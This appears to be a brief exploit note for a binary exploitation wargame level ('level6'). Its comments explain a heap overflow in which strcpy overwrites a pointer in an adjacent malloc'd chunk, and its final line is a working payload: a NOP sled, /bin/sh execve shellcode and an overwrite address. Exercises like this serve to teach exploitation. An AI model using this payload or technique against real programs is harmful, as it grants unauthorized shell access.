# There is 2 malloc in this code.
# The first one is at the address 0x0804a008
# The second one at 0x0804a050
# Theoretically we can use the strcpy function to
# overide the second malloc's adress using argv[1].
# We just have to point it up to the adress of our
# shellcode and when the second malloc will be called
# our shellcode will be executed.
# The second adress is overwritten after 72 bytes in argv[1].
# Now we just have to build our payload
# ./level6 $(python -c 'print "\x90"*47 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x10\xa0\x04\x08"')